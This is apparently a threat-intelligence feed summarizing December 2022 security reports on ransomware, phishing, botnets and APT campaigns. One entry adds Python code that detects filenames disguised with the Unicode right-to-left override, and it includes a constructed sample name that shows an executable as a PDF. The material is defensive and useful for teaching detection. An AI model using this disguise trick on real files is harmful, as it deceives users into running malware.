Intel Source:
ASEC
Intel Name:
Magniber_Ransomware_distribution_again
Date of Scan:
2022-12-15
Impact:
LOW
Summary:
The ASEC analysis team has discovered that Magniber Ransomware is being distributed again with COVID-19 related filenames, while the threat actor has changed the infection vector and is using social engineering techniques.
Source: https://asec.ahnlab.com/en/44315/
2022-12-15
Spearphishing_Campaign_Targeting_Japanese_Political_Entities
LOW
Intel Source:
ESET Research
Intel Name:
Spearphishing_Campaign_Targeting_Japanese_Political_Entities
Date of Scan:
2022-12-15
Impact:
LOW
Summary:
Researchers from ESET have discovered a spearphishing campaign targeting Japanese political entities a few weeks before the House of Councillors elections, and in the process uncovered a previously undescribed MirrorFace credential stealer.
Source: https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/
2022-12-15
STOP_Ransomware_Distributing_in_Korea
LOW
Intel Source:
ASEC
Intel Name:
STOP_Ransomware_Distributing_in_Korea
Date of Scan:
2022-12-15
Impact:
LOW
Summary:
ASEC researchers have discovered that the STOP ransomware is being distributed in Korea. The files currently being distributed are in the MalPe form, just like SmokeLoader and Vidar, and their filenames include a random 4-byte string.
Source: https://asec.ahnlab.com/en/43861/
2022-12-15
Hackers_Leveraging_Google_Ads_to_Distribute_IcedID
LOW
Intel Source:
ISC.SANS
Intel Name:
Hackers_Leveraging_Google_Ads_to_Distribute_IcedID
Date of Scan:
2022-12-15
Impact:
LOW
Summary:
Researchers from SANS have identified campaigns pushing IcedID malware (also known as Bokbot) via Google Ads.
Source: https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344/
2022-12-15
Iran_linked_cyberspies_expand_targeting_to_medical_researchers_and_travel_agencies
LOW
Intel Source:
Proofpoint
Intel Name:
Iran_linked_cyberspies_expand_targeting_to_medical_researchers_and_travel_agencies
Date of Scan:
2022-12-15
Impact:
LOW
Summary:
Researchers from Proofpoint have analyzed the threat group TA453 and assess that its outlier campaigns are likely to continue and reflect IRGC intelligence collection requirements, including possible support for hostile, and even kinetic, operations.
Source: https://www.proofpoint.com/us/blog/threat-insight/ta453-refuses-be-bound-expectations
2022-12-15
Hackers_Blast_Open_Source_Repositories_with_Over_144000_Malicious_Packages
LOW
Intel Source:
Checkmarx Security
Intel Name:
Hackers_Blast_Open_Source_Repositories_with_Over_144000_Malicious_Packages
Date of Scan:
2022-12-15
Impact:
LOW
Summary:
Checkmarx researchers have identified that unknown threat actors have uploaded a massive 144,294 phishing-related packages to open-source package repositories, including NPM, PyPI, and NuGet.
Source: https://checkmarx.com/blog/how-140k-nuget-npm-and-pypi-packages-were-used-to-spread-phishing-links/
2022-12-14
GoTrim_Botnet_Brute_Forces_WordPress_Site_Admin_Accounts
LOW
Intel Source:
Fortinet
Intel Name:
GoTrim_Botnet_Brute_Forces_WordPress_Site_Admin_Accounts
Date of Scan:
2022-12-14
Impact:
LOW
Summary:
Researchers from Fortinet have observed that a new Go-based botnet malware named 'GoTrim' is scanning the web for self-hosted WordPress websites and attempting to brute-force the administrator's password in order to take control of the site.
Source: https://www.fortinet.com/blog/threat-research/gotrim-go-based-botnet-actively-brute-forces-wordpress-websites
2022-12-14
Targeted_Attacks_Leverage_Signed_Malicious_Microsoft_Drivers
LOW
Intel Source:
Mandiant, SentinelOne
Intel Name:
Targeted_Attacks_Leverage_Signed_Malicious_Microsoft_Drivers
Date of Scan:
2022-12-14
Impact:
LOW
Summary:
SentinelOne discovered active threat actors abusing legitimately signed Microsoft drivers in active intrusions into telecommunication, BPO, MSSP, and financial services businesses. Investigations into these intrusions led to the discovery of POORTRY and STONESTOP malware, part of a small toolkit designed to terminate AV and EDR processes.
Source: https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware https://www.sentinelone.com/labs/driving-through-defenses-targeted-attacks-leverage-signed-malicious-microsoft-drivers/
2022-12-14
Malware_Strains_Targeting_Python_and_JavaScript_Developers
LOW
Intel Source:
Phylum
Intel Name:
Malware_Strains_Targeting_Python_and_JavaScript_Developers
Date of Scan:
2022-12-14
Impact:
LOW
Summary:
Phylum researchers have identified an active malware campaign targeting the Python Package Index (PyPI) and npm repositories for Python and JavaScript with typosquatting and fake modules that deploy a ransomware strain, marking the latest security issue to affect software supply chains.
Source: https://blog.phylum.io/phylum-detects-active-typosquatting-campaign-in-pypi
2022-12-14
Hackers_Leveraging_LiveHelp100_For_Supply_Chain_Attacks
LOW
Intel Source:
TrendMicro
Intel Name:
Hackers_Leveraging_LiveHelp100_For_Supply_Chain_Attacks
Date of Scan:
2022-12-14
Impact:
LOW
Summary:
Researchers from Trend Micro have analyzed the infection chain and the pieces of malware used by malicious actors in supply-chain attacks that leveraged trojanized installers of chat-based customer engagement platforms.
Source: https://www.trendmicro.com/en_us/research/22/l/probing-weaponized-chat-applications-abused-in-supply-chain-atta.html
2022-12-14
Expendtion_of_Venom_RAT_operations
LOW
Intel Source:
Cyble
Intel Name:
Expendtion_of_Venom_RAT_operations
Date of Scan:
2022-12-14
Impact:
LOW
Summary:
CRIL has uncovered a new version of the Venom RAT (Remote Access Trojan), which can steal sensitive data from a victim's computer. Venom RAT is an effective malware that works stealthily, giving attackers unauthorized access to the victim's machine. Threat actors can then use the victim's computer to perform various malicious activities such as installing and removing additional malware, manipulating files, reading data from the keyboard, harvesting login credentials, and monitoring the clipboard.
Source: https://blog.cyble.com/2022/12/13/venom-rat-expands-its-operations-by-adding-a-stealer-module/
2022-12-14
COALT_MIRAGE_Hackers_Leveraging_Drokbk_Malware
LOW
Intel Source:
Secureworks
Intel Name:
COALT_MIRAGE_Hackers_Leveraging_Drokbk_Malware
Date of Scan:
2022-12-14
Impact:
LOW
Summary:
Researchers from Secureworks have investigated the Drokbk malware, which is operated by a subgroup of the Iranian government-sponsored COBALT MIRAGE threat group. This subgroup is known as Cluster B. Drokbk is written in .NET and is made up of a dropper and a payload.
Source: https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver
2022-12-14
Cloud_Atlas_Targeting_Entities_in_Russia_and_Belarus
LOW
Intel Source:
Checkpoint
Intel Name:
Cloud_Atlas_Targeting_Entities_in_Russia_and_Belarus
Date of Scan:
2022-12-14
Impact:
LOW
Summary:
Checkpoint researchers have identified Cloud Atlas continuously and persistently targeting entities of interest. With the escalation of the conflict between Russia and Ukraine, their focus for the past year has been on Russia and Belarus and their diplomatic, government, energy, and technology sectors, and on the annexed regions of Ukraine.
Source: https://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/
2022-12-14
Vulnerabilities_Found_in_Adning_and_Kaswara_Plugin
MEDIUM
Intel Source:
Wordfence
Intel Name:
Vulnerabilities_Found_in_Adning_and_Kaswara_Plugin
Date of Scan:
2022-12-14
Impact:
MEDIUM
Summary:
Researchers from Wordfence have observed spikes in attacks against vulnerable WordPress plugins, including Adning and Kaswara, which serve as a reminder to keep plugins updated.
Source: https://www.wordfence.com/blog/2022/12/spikes-in-attacks-serve-as-a-reminder-to-update-plugins/
2022-12-14
The_new_Go_language_botnet_RedGoBot
LOW
Intel Source:
Weixin
Intel Name:
The_new_Go_language_botnet_RedGoBot
Date of Scan:
2022-12-14
Impact:
LOW
Summary:
Last month, QiAnXin Threat Intelligence Center captured a malicious sample from an unknown family that exploited the Vacron NVR RCE vulnerability to spread. Detailed analysis showed that this series of samples does not belong to any known malicious family. The sample prints the string "GoBot" when it runs, and, in reference to the author's handle "@redbot on top" on his website, the researchers named it RedGoBot.
Source: https://mp.weixin.qq.com/s/4iTA4LBNEnOQ5T5AcvZCCA
2022-12-14
MS_Signed_Malicious_Drivers_Used_in_Ransomware_Attacks
MEDIUM
Intel Source:
SentinelOne, Mandiant and Sophos
Intel Name:
MS_Signed_Malicious_Drivers_Used_in_Ransomware_Attacks
Date of Scan:
2022-12-14
Impact:
MEDIUM
Summary:
Microsoft revoked several hardware developer accounts after drivers signed through their profiles were used in cyberattacks, including ransomware incidents. Multiple researchers explain that threat actors are utilizing malicious kernel-mode hardware drivers whose trust is verified with Authenticode signatures from Microsoft's Windows Hardware Developer Program.
Source: https://www.sentinelone.com/labs/driving-through-defenses-targeted-attacks-leverage-signed-malicious-microsoft-drivers/ https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware https://news.sophos.com/en-us/2022/12/13/signed-driver-malware-moves-up-the-software-trust-chain/
2022-12-14
Analysis_of_Royal_Ransomware
MEDIUM
Intel Source:
Cybereason
Intel Name:
Analysis_of_Royal_Ransomware
Date of Scan:
2022-12-14
Impact:
MEDIUM
Summary:
The Royal ransomware group emerged in early 2022 and has gained momentum since the middle of the year. Its ransomware, which the group deploys through different TTPs, has impacted multiple organizations across the globe. The group itself is suspected of consisting of former members of other ransomware groups, based on similarities researchers have observed between Royal ransomware and other ransomware operators.
Source: https://www.cybereason.com/blog/royal-ransomware-analysis
2022-12-14
Thre_increased_Activity_of_Mallox_Ransomware
LOW
Intel Source:
Cyble
Intel Name:
Thre_increased_Activity_of_Mallox_Ransomware
Date of Scan:
2022-12-14
Impact:
LOW
Summary:
Cyble Research and Intelligence Labs (CRIL) recently observed a spike in Mallox ransomware samples. Researchers also call it TargetCompany ransomware because it adds the targeted company's name as a file extension to the encrypted files. In September 2022, researchers identified a TargetCompany ransomware variant targeting Microsoft SQL servers and adding the "Fargo" extension to the encrypted files. TargetCompany ransomware is also known to add a "Mallox" extension after encrypting files.
Source: https://blog.cyble.com/2022/12/08/mallox-ransomware-showing-signs-of-increased-activity/
2022-12-13
New_Python_Backdoor_Targeting_VMware_ESXi_Servers
LOW
Intel Source:
Juniper Network
Intel Name:
New_Python_Backdoor_Targeting_VMware_ESXi_Servers
Date of Scan:
2022-12-13
Impact:
LOW
Summary:
Juniper Networks researchers have identified a previously undocumented Python backdoor targeting VMware ESXi servers, enabling hackers to execute commands remotely on a compromised system.
Source: https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers
2022-12-13
Microsoft_Account_Stealing_Phishing_Page
LOW
Intel Source:
ASEC
Intel Name:
Microsoft_Account_Stealing_Phishing_Page
Date of Scan:
2022-12-13
Impact:
LOW
Summary:
Researchers from ASEC have identified that a large portion of phishing emails aim to steal login credentials for Microsoft accounts.
Source: https://asec.ahnlab.com/en/43821/
2022-12-13
Continuation_of_Iranian_Exploitation_Activities
MEDIUM
Intel Source:
Cymru
Intel Name:
Continuation_of_Iranian_Exploitation_Activities
Date of Scan:
2022-12-13
Impact:
MEDIUM
Summary:
Team Cymru shared an update on its ongoing tracking of the PHOSPHORUS threat actor group associated with Iran. PHOSPHORUS is an Iranian threat group known to target organizations in the energy, government, and technology sectors based in Europe, the Middle East, the United States, and other countries/regions.
Source: https://www.team-cymru.com/post/iranian-exploitation-activities-continue-as-of-november-2022
2022-12-13
The_Cloud_Atlas_group_activity
LOW
Intel Source:
Ptsecurity
Intel Name:
The_Cloud_Atlas_group_activity
Date of Scan:
2022-12-13
Impact:
LOW
Summary:
Ptsecurity discussed the main techniques of the Cloud Atlas group, took an in-depth look at the tools they use, and posted a detailed analysis and description of the functionality of these tools.
Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt-cloud-atlas-unbroken-threat/
2022-12-13
Formbook_malware_deployed_using_OneNote_Documents
LOW
Intel Source:
Trustwave
Intel Name:
Formbook_malware_deployed_using_OneNote_Documents
Date of Scan:
2022-12-13
Impact:
LOW
Summary:
Trustwave uncovered threat actors using a OneNote document to move Formbook malware, an information stealing trojan sold on an underground hacking forum since mid-2016 as malware-as-a-service.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/
2022-12-13
Analysis_of_the_infamous_Azov_Ransomware
LOW
Intel Source:
Checkpoint
Intel Name:
Analysis_of_the_infamous_Azov_Ransomware
Date of Scan:
2022-12-13
Impact:
LOW
Summary:
Checkpoint has shared a report with more details regarding the internal workings of Azov ransomware and its technical features.
Source: https://research.checkpoint.com/2022/pulling-the-curtains-on-azov-ransomware-not-a-skidsware-but-polymorphic-wiper/
2022-12-13
FortiOS_SSL_VPN_bug
MEDIUM
Intel Source:
Fortiguard
Intel Name:
FortiOS_SSL_VPN_bug
Date of Scan:
2022-12-13
Impact:
MEDIUM
Summary:
Fortinet urges customers to update their installs to address an actively exploited FortiOS SSL-VPN vulnerability, tracked as CVE-2022-42475, that could be exploited by an unauthenticated, remote attacker to execute arbitrary code on devices.
Source: https://www.fortiguard.com/psirt/FG-IR-22-398
2022-12-12
MuddyWater_APT_group_is_back_with_updated_TTPs
LOW
Intel Source:
Deep Instinct
Intel Name:
MuddyWater_APT_group_is_back_with_updated_TTPs
Date of Scan:
2022-12-12
Impact:
LOW
Summary:
Researchers from Deep Instinct have identified a new campaign conducted by the MuddyWater APT (aka SeedWorm, TEMP.Zagros, and Static Kitten) that targeted Armenia, Azerbaijan, Egypt, Iraq, Israel, Jordan, Oman, Qatar, Tajikistan, and the United Arab Emirates.
Source: https://www.deepinstinct.com/blog/new-muddywater-threat-old-kitten-new-tricks
2022-12-12
Linux_Cryptocurrency_Mining_Attacks_Increasing_via_CHAOS_RAT
LOW
Intel Source:
TrendMicro
Intel Name:
Linux_Cryptocurrency_Mining_Attacks_Increasing_via_CHAOS_RAT
Date of Scan:
2022-12-12
Impact:
LOW
Summary:
Researchers from Trend Micro have observed a cryptocurrency mining attack that incorporated an advanced remote access trojan (RAT) named the CHAOS Remote Administrative Tool.
Source: https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html
2022-12-12
A_new_batch_of_Web_Skimming_attacks
LOW
Intel Source:
Jscrambler
Intel Name:
A_new_batch_of_Web_Skimming_attacks
Date of Scan:
2022-12-12
Impact:
LOW
Summary:
Jscrambler analysts observed a new modus operandi shared by three web-skimming threat groups and published a detailed analysis of their findings.
Source: https://blog.jscrambler.com/defcon-skimming-a-new-batch-of-web-skimming-attacks/
2022-12-12
World_Cup_Keywords_targeted_by_Chinese_Gambling_Spam
LOW
Intel Source:
Sucuri
Intel Name:
World_Cup_Keywords_targeted_by_Chinese_Gambling_Spam
Date of Scan:
2022-12-12
Impact:
LOW
Summary:
Sucuri researchers observed that many of the websites compromised by a Chinese gambling spam campaign have recently been updated with modified titles containing keywords related to the Qatar 2022 FIFA World Cup, as the campaign pivots to leverage search traffic for the popular soccer championship.
Source: https://blog.sucuri.net/2022/12/chinese-gambling-spam-targets-world-cup-keywords.html
2022-12-10
The_Redline_Stealer_distribution_via_fake_software_AnyDesk
MEDIUM
Intel Source:
Esentire
Intel Name:
The_Redline_Stealer_distribution_via_fake_software_AnyDesk
Date of Scan:
2022-12-10
Impact:
MEDIUM
Summary:
eSentire SOC Cyber Analysts performed a deeper malware analysis of the technical details of how the Redline Stealer malware operates and concluded that Redline Stealer is mostly distributed via fake software. The attacker(s) also use YouTube and/or other third-party advertising platforms to spread the stealer, and use an AutoIt wrapper and various crypting services to obfuscate the stealer binary. Redline comes with loader tasks that allow an attacker to perform various actions on the infected host, including file download, process injection, and command execution.
Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-redline-stealer
2022-12-10
The_various_scams_exploiting_the_popularity_of_the_FIFA_World_Cup
LOW
Intel Source:
Cyble
Intel Name:
The_various_scams_exploiting_the_popularity_of_the_FIFA_World_Cup
Date of Scan:
2022-12-10
Impact:
LOW
Summary:
While monitoring phishing activity, Cyble Research & Intelligence Labs identified a few crypto phishing schemes involving the use of the FIFA World Cup theme to lure the victims. The phishing site “football-blnance[.]com” was pretending to be the Binance cryptocurrency website attempting to trick users into giving sensitive information by offering free Non-Fungible Tokens (NFTs).
Source: https://blog.cyble.com/2022/12/09/threat-actors-targeting-fans-amid-fifa-world-cup-fever/
2022-12-09
New_Infection_Technique_of_GootLoader_malware
MEDIUM
Intel Source:
Esentire
Intel Name:
New_Infection_Technique_of_GootLoader_malware
Date of Scan:
2022-12-09
Impact:
MEDIUM
Summary:
On December 2, 2022, one of eSentire's SOC Cyber Analysts raised an incident involving the GootLoader malware at a pharmaceutical company. eSentire's Threat Response Unit proceeded with an in-depth threat investigation of GootLoader.
Source: https://www.esentire.com/blog/gootloader-striking-with-a-new-infection-technique
2022-12-09
kamikaze_drones_and_DolphinCape_malware
MEDIUM
Intel Source:
CERT-UA
Intel Name:
kamikaze_drones_and_DolphinCape_malware
Date of Scan:
2022-12-09
Impact:
MEDIUM
Summary:
The Government Computer Emergency Response Team of Ukraine (CERT-UA) received information from specialists of the cyber security division of JSC "Ukrzaliznytsia" regarding e-mails with the subject "How to recognize a kamikaze drone" sent from the address "morgunov.a@dsns.com[.]ua", purportedly on behalf of the State Emergency Service of Ukraine.
Source: https://cert.gov.ua/article/3192088
2022-12-09
Internet_Explorer_0day_exploited_by_North_Korean_actor_APT37
LOW
Intel Source:
Google
Intel Name:
Internet_Explorer_0day_exploited_by_North_Korean_actor_APT37
Date of Scan:
2022-12-09
Impact:
LOW
Summary:
Google's Threat Analysis Group (TAG) routinely hunts for 0-day vulnerabilities exploited in the wild. This post describes a 0-day vulnerability, discovered by TAG in late October 2022, embedded in malicious documents and used to target users in South Korea.
Source: https://blog.google/threat-analysis-group/internet-explorer-0-day-exploited-by-north-korean-actor-apt37/
2022-12-09
The_identified_TAG53_infrastructure_features_common_traits
LOW
Intel Source:
Recorded Future
Intel Name:
The_identified_TAG53_infrastructure_features_common_traits
Date of Scan:
2022-12-09
Impact:
LOW
Summary:
Recorded Future's Insikt Group has identified new infrastructure used by TAG-53, a group likely linked to suspected Russian threat activity groups Callisto Group, COLDRIVER, and SEABORGIUM.
Source: https://www.recordedfuture.com/exposing-tag-53-credential-harvesting-infrastructure-for-russia-aligned-espionage-operations
2022-12-09
Cloud_compute_credentials_attack_examples
LOW
Intel Source:
PaloAlto
Intel Name:
Cloud_compute_credentials_attack_examples
Date of Scan:
2022-12-09
Impact:
LOW
Summary:
Palo Alto Networks Unit 42 shared in their blog two examples of cloud compute credential attacks in the wild. They described the post-breach actions executed during the attacks and shared the flow of these two attacks against cloud infrastructure. The attack flows show how threat actors abuse stolen compute credentials to pursue a variety of attack vectors and abuse cloud services in unexpected ways. This emphasizes how important it is to follow Amazon Web Services and Google Cloud logging and monitoring best practices.
Source: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
2022-12-09
Breaking_the_silence_Truebot_activity
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
Breaking_the_silence_Truebot_activity
Date of Scan:
2022-12-09
Impact:
MEDIUM
Summary:
Cisco Talos researchers report that one of the new follow-on payloads that Truebot drops is the Grace (aka FlawedGrace and GraceWire) malware, which is attributed to TA505, further supporting the attribution of this activity.
Source: https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
2022-12-08
Phishing_Email_Impersonating_Quasi_governmental_Organization_Being_Distributed
LOW
Intel Source:
ASEC
Intel Name:
Phishing_Email_Impersonating_Quasi_governmental_Organization_Being_Distributed
Date of Scan:
2022-12-08
Impact:
LOW
Summary:
The ASEC analysis team has recently detected the distribution of a phishing email impersonating a non-profit quasi-governmental organization. Since the email uses a webpage disguised as the login page of GobizKOREA, a service operated by the Korea SMEs and Startups Agency (KOSME), users working in the trading industry should take extra caution.
Source: https://asec.ahnlab.com/en/43596/
2022-12-08
DeathStalker_targets_legal_entities_with_new_Janicab_variant
LOW
Intel Source:
Securelist
Intel Name:
DeathStalker_targets_legal_entities_with_new_Janicab_variant
Date of Scan:
2022-12-08
Impact:
LOW
Summary:
While tracking DeathStalker intrusions that use the Janicab malware family, Securelist's researchers identified a new Janicab variant used to target legal entities in the Middle East throughout 2020, possibly active during 2021, and potentially extending an extensive campaign that has been traced back to early 2015 and targeted legal, financial, and travel agencies in the Middle East and Europe.
Source: https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/
2022-12-08
New_obfuscation_service_used_by_Ermac_when_distributed_together_with_desktop_stealers
LOW
Intel Source:
Threat Fabric
Intel Name:
New_obfuscation_service_used_by_Ermac_when_distributed_together_with_desktop_stealers
Date of Scan:
2022-12-08
Impact:
LOW
Summary:
ThreatFabric's analysts discovered a campaign employing several Trojans and targeting both Android and Windows users at the same time, in order to reach as many victims as possible. Besides the Ermac Android banking Trojan, the campaign involved desktop malware in the form of the Erbium and Aurora stealers and the Laplas "clipper".
Source: https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html
2022-12-08
Cuba_Ransomware_TTPs
MEDIUM
Intel Source:
Picus Security
Intel Name:
Cuba_Ransomware_TTPs
Date of Scan:
2022-12-08
Impact:
MEDIUM
Summary:
Security researchers from Picus Security have tracked a new variant of the Cuba ransomware, also known as Tropical Scorpius. The Cuba ransomware group mainly targets the manufacturing, professional and legal services, financial services, construction, high technology, and healthcare sectors.
Source: https://www.picussecurity.com/resource/blog/cisa-alert-aa22-335a-cuba-ransomware-analysis-simulation-ttps-iocs
2022-12-07
Resumexll_File_Being_Distributed_in_Korea
LOW
Intel Source:
ASEC
Intel Name:
Resumexll_File_Being_Distributed_in_Korea
Date of Scan:
2022-12-07
Impact:
LOW
Summary:
The ASEC analysis team shared that malware in the XLL file format (file extension: .xll) was being distributed via email. An XLL file is a DLL-form PE (Portable Executable) file that is executed by Microsoft Excel.
Source: https://asec.ahnlab.com/en/43332/
2022-12-07
Targeted_attacks_by_DEV_0139_against_the_cryptocurrency_industry
LOW
Intel Source:
Microsoft
Intel Name:
Targeted_attacks_by_DEV_0139_against_the_cryptocurrency_industry
Date of Scan:
2022-12-07
Impact:
LOW
Summary:
Microsoft shared that cryptocurrency companies have been targeted by a threat group DEV-0139 via Telegram groups used to communicate with the firms' VIP customers.
Source: https://www.microsoft.com/en-us/security/blog/2022/12/06/dev-0139-launches-targeted-attacks-against-the-cryptocurrency-industry/
2022-12-07
A_new_Agrius_threat_group_wiper_Fantasy
MEDIUM
Intel Source:
WeliveSecurity
Intel Name:
A_new_Agrius_threat_group_wiper_Fantasy
Date of Scan:
2022-12-07
Impact:
MEDIUM
Summary:
Agrius is a new Iranian group that has been targeting victims in Israel and the United Arab Emirates since 2020. The group initially deployed a wiper and has recently deployed a new wiper named Fantasy. Most of its code base comes from Apostle, Agrius's previous wiper.
Source: https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/
2022-12-07
Phishing_Email_Disguised_as_a_WellKnown_Korean_Airline
LOW
Intel Source:
ASEC
Intel Name:
Phishing_Email_Disguised_as_a_WellKnown_Korean_Airline
Date of Scan:
2022-12-07
Impact:
LOW
Summary:
The ASEC analysis team has recently discovered a phishing email that impersonates a well-known Korean airline to collect user credentials. The phishing email contains a notice about an airline ticket payment, inducing the reader to connect to a disguised phishing page, with specific ticket prices and details that imply the sender has background information on the reader.
Source: https://asec.ahnlab.com/en/43510/
2022-12-07
Zerobot_New_Go_Based_Botnet
MEDIUM
Intel Source:
Fortinet
Intel Name:
Zerobot_New_Go_Based_Botnet
Date of Scan:
2022-12-07
Impact:
MEDIUM
Summary:
The FortiGuard Labs team recently observed a new botnet written in the Go language being distributed through IoT vulnerabilities and categorized it as critical. This botnet, known as Zerobot, contains several modules, including self-replication, attacks for different protocols, and self-propagation. It also communicates with its command-and-control server using the WebSocket protocol. The researchers detailed how this malware leverages vulnerabilities and examined its behavior once inside an infected device.
Source: https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities
2022-12-07
Malware_Distributed_with_Disguised_Filenames
LOW
+
Intel Source:
ASEC
Intel Name:
Malware_Distributed_with_Disguised_Filenames
Date of Scan:
2022-12-07
Impact:
LOW
Summary:
The ASEC analysis team posted about malware distributed with filenames that abuse the RTLO (Right-To-Left Override) Unicode control character (U+202E), which reverses the display order of the text that follows it. By placing the character inside the filename, the malware makes the displayed name end in a harmless-looking extension while the real extension is executable, inducing users to run the file.
Source: https://asec.ahnlab.com/en/43518/
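The following is an added example, not code from the ASEC post, showing how the RTLO trick works and how to detect it when scanning filenames: the real extension is taken from the raw stored name, the displayed name is approximated by reversing everything after the U+202E character, and a name is flagged when the two extensions disagree and the real one is executable. The sample names and the executable-extension list are constructed for the example.

```python
# Unicode bidi control characters that can change how a filename is drawn.
# U+202E (RIGHT-TO-LEFT OVERRIDE) is the one abused in the RTLO trick; the
# others are listed because they can be combined with it.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO",
    "\u202e": "RLO", "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI",
    "\u2069": "PDI",
}

# Extensions Windows dispatches to an interpreter or loader (assumed list).
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                         ".js", ".jse", ".vbs", ".wsf", ".hta", ".lnk", ".msi"}


def strip_controls(name: str) -> str:
    """Drop bidi controls; what remains is the name the OS actually uses."""
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)


def real_extension(name: str) -> str:
    """The extension the shell dispatches on, taken from the raw stored name."""
    clean = strip_controls(name)
    dot = clean.rfind(".")
    return clean[dot:].lower() if dot != -1 else ""


def displayed_name(name: str) -> str:
    """Approximate what a file manager shows: everything after the first RLO
    is rendered right-to-left, i.e. reversed, until the end of the name."""
    idx = name.find("\u202e")
    if idx == -1:
        return strip_controls(name)
    head = name[:idx]
    tail = strip_controls(name[idx + 1:])
    return head + tail[::-1]


def analyze_filename(name: str) -> dict:
    """Report displayed vs. real extension and flag an RTLO disguise."""
    controls = [(i, BIDI_CONTROLS[ch]) for i, ch in enumerate(name)
                if ch in BIDI_CONTROLS]
    shown = displayed_name(name)
    shown_dot = shown.rfind(".")
    shown_ext = shown[shown_dot:].lower() if shown_dot != -1 else ""
    real_ext = real_extension(name)
    return {
        "raw": name,
        "displayed": shown,
        "bidi_controls": controls,
        "displayed_extension": shown_ext,
        "real_extension": real_ext,
        # A bidi control is only a problem when it hides an executable type.
        "suspicious": bool(controls) and real_ext in EXECUTABLE_EXTENSIONS
                      and shown_ext != real_ext,
    }


def scan_filenames(names):
    """Return the analyses of names that look like an RTLO disguise."""
    return [r for r in (analyze_filename(n) for n in names) if r["suspicious"]]


# Constructed sample names (not from the ASEC post): one RTLO disguise that
# displays as "Invoice_2022exe.pdf" but is really an .exe, one legitimate
# Hebrew filename that needs no override, and one plain document.
SAMPLE_NAMES = [
    "Invoice_2022\u202efdp.exe",
    "\u05d3\u05d5\u05d7.pdf",
    "notes.txt",
]

if __name__ == "__main__":
    for finding in scan_filenames(SAMPLE_NAMES):
        print(f"{finding['displayed']!r} is really {finding['real_extension']}")
```

Right-to-left text in a filename is legitimate on its own, so the check keys on the mismatch between the rendered and the dispatched extension rather than on the presence of the control character alone.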
2022-12-07
CrowdStrike_Investigations_Reveal_Intrusion_Campaign_Targeting_Telco_and_BPO_Companies
LOW
+
Intel Source:
CrowdStrike
Intel Name:
CrowdStrike_Investigations_Reveal_Intrusion_Campaign_Targeting_Telco_and_BPO_Companies
Date of Scan:
2022-12-07
Impact:
LOW
Summary:
CrowdStrike Services reviews a recent, extremely persistent intrusion campaign targeting telecommunications and business process outsourcing (BPO) companies and outlines how organizations can defend and secure their environments.
Source: https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/
2022-12-07
A_New_BackdoorDiplomacy_Threat_Actor_Campaign_Investigation
LOW
+
Intel Source:
Bitdefender
Intel Name:
A_New_BackdoorDiplomacy_Threat_Actor_Campaign_Investigation
Date of Scan:
2022-12-07
Impact:
LOW
Summary:
Bitdefender researchers investigated a malicious campaign targeting the Middle East that abuses binaries vulnerable to DLL sideloading. The researchers analyzed the evidence and found traces linking it to a cyber-espionage operation most likely performed by the Chinese threat actor BackdoorDiplomacy against victims tied to the telecom industry in the Middle East.
Source: https://www.bitdefender.com/files/News/CaseStudies/study/426/Bitdefender-PR-Whitepaper-BackdoorDiplomacy-creat6507-en-EN.pdf
2022-12-06
Ransomware_Turning_into_an_Accidental_Wiper
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Ransomware_Turning_into_an_Accidental_Wiper
Date of Scan:
2022-12-06
Impact:
MEDIUM
Summary:
Fortinet researchers have observed a Cryptonite sample in the wild that never presents the decryption window and instead acts as a wiper. They also note a recent increase in ransomware intentionally turned into wiper malware, primarily as part of political campaigns.
Source: https://www.fortinet.com/blog/threat-research/The-story-of-a-ransomware-turning-into-an-accidental-wiper
2022-12-05
Lazarus_APT_uses_fake_cryptocurrency_apps_to_spread_AppleJeus_Malware
LOW
+
Intel Source:
Security Affairs
Intel Name:
Lazarus_APT_uses_fake_cryptocurrency_apps_to_spread_AppleJeus_Malware
Date of Scan:
2022-12-05
Impact:
LOW
Summary:
The North Korea-linked Lazarus APT spreads fake cryptocurrency apps under the fake brand BloxHolder to install the AppleJeus malware.
Source: https://securityaffairs.co/wordpress/139290/apt/lazarus-apt-bloxholder-campaign.html
2022-12-05
Masquerading_as_a_Software_Installer
LOW
+
Intel Source:
Cybereason
Intel Name:
Masquerading_as_a_Software_Installer
Date of Scan:
2022-12-05
Impact:
LOW
Summary:
The Cybereason GSOC team analyzes a technique that uses Windows Installer (.msi) packages to compromise victims' machines. MSI, formerly known as Microsoft Installer, is the Windows installer package format.
Source: https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer
2022-12-02
A_deep_dive_into_ZetaNile
LOW
+
Intel Source:
Reversing Labs
Intel Name:
A_deep_dive_into_ZetaNile
Date of Scan:
2022-12-02
Impact:
LOW
Summary:
ZetaNile is a set of trojanized open-source software implants used by Lazarus/ZINC; Microsoft calls the set ZetaNile and CISA calls it BLINDINGCAN. The campaign presented an opportunity for deep study by the ReversingLabs research team.
